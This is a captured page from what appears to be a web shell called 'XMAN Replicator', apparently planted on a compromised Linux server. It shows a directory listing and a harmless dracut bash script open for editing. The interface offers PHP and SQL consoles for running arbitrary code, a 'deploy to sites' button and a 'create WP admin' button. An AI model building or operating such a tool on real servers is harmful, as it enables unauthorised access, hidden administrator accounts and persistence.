🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
lib
/
dracut
/
modules.d
/
00bash
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2025-12-23 06:00
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2025-12-17 18:54
🔄
🗑️
🗑️📁
⬇️
🔒
module-setup.sh
361 B
-rwxr-xr-x
2018-10-08 13:38
✏️
🔄
🗑️
⬇️
🔒
Edit: module-setup.sh
#!/bin/bash # called by dracut check() { require_binaries /bin/bash } # called by dracut depends() { return 0 } # called by dracut install() { # If another shell is already installed, do not use bash [[ -x $initdir/bin/sh ]] && return # Prefer bash as /bin/sh if it is available. inst /bin/bash && ln -sf bash "${initdir}/bin/sh" }
Save
PHP Console
Execute
SQL Console
Execute